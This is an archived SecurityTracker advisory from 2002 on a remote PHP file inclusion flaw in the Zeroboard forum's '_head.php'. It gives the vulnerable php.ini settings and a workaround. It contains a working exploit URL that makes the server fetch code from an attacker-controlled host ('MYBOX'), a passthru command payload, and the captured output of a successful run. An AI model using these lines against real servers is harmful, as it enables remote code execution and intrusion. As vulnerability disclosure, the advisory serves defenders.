SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Zeroboard Vendors:   NZEO
Zeroboard Web Forum Software Lets Remote Users Execute Arbitrary PHP on the Server
SecurityTracker Alert ID:  1004553
SecurityTracker URL:  http://securitytracker.com/id/1004553
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 17 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.x; 4.1pl2
Description:   A vulnerability was reported in the Zeroboard web forum software. A remote user can execute arbitrary PHP code on the server.

JCC issued a security advisory warning that, in a certain configuration, a remote user can include arbitrary and remotely located PHP files for execution on the server. The vulnerability can reportedly be triggered when the following 'php.ini' configuration settings are present:

allow_url_fopen = On
register_globals = On

The flaw is reported to exist in the '_head.php' script.

A demonstration exploit URL is provided:

"http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE"

With the above URL, a remote user can supply a remote URL for the '_zb_path' variable that points to a malicious file on another server ('MYBOX', in this example), such as the following file:

--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------

This malicious 'alib.php' file can then be executed on the 'BOARD_URL' server with the following type of URL:

http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"

Impact:   A remote user can execute arbitrary PHP code on the server.
Solution:   No solution was available at the time of this entry.

The author of the report has provided a workaround configuration:

allow_url_fopen = off and register_globals = off.

Vendor URL:  www.zeroboard.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  malicious PHP source injection


JCC Security Advisory
June 15, 2002

malicious PHP source injection

Description

Zeroboard is one of popular PHP web boards in Korea.
When allow_url_fopen = On and register_globals = On in php.ini, 
Zeroboard has vulnerability because _head.php contains dangerous codes.
 So an attacker can include any files into server's PHP codes.

Impact

All versions of Zeroboard 4.x.

Workaround

allow_url_fopen = off and register_globals = off. 

Tested systems 

Zeroboard 4.1pl2 Debian GNU/Linux SID(x86)

Background

We checked the vulnerability with "http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE" and
 made a sample code, alib.php,

--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------

and type the following URL to invoke this sample code.

TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"

-------out put----------------------------
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php check_user_id.php comment_ok.php config.php
 data del_comment.php del_comment_ok.php delete.php delete_ok.php download.php error.php icon image_box.php images include index.html
 install.php install1.php install2.php install2_ok.php install_ok.php latest_skin lib.php license.txt list_all.php login.php login_check.php
 logout.php lostid.php lostid_search.php member_join.php member_join_ok.php member_memo.php member_memo2.php member_memo3.php member_modify.php
 member_modify_ok.php member_out.php open_window.php outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php
 setup.php skin style.css view.php view_info.php view_info2.php view_preview.php vote.php write.php write_ok.php zboard.php zipcode
 
Fatal error: Call to undefined function: dbconn() in /home/morris/public_html/tmp/bbs/_head.php on line 41
-----------------------------------------

thx for BlackNight at r0ar

---
http://jcc.hackerslab.org(at morris Chang)

e-mail : morris@xsdeny.net 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC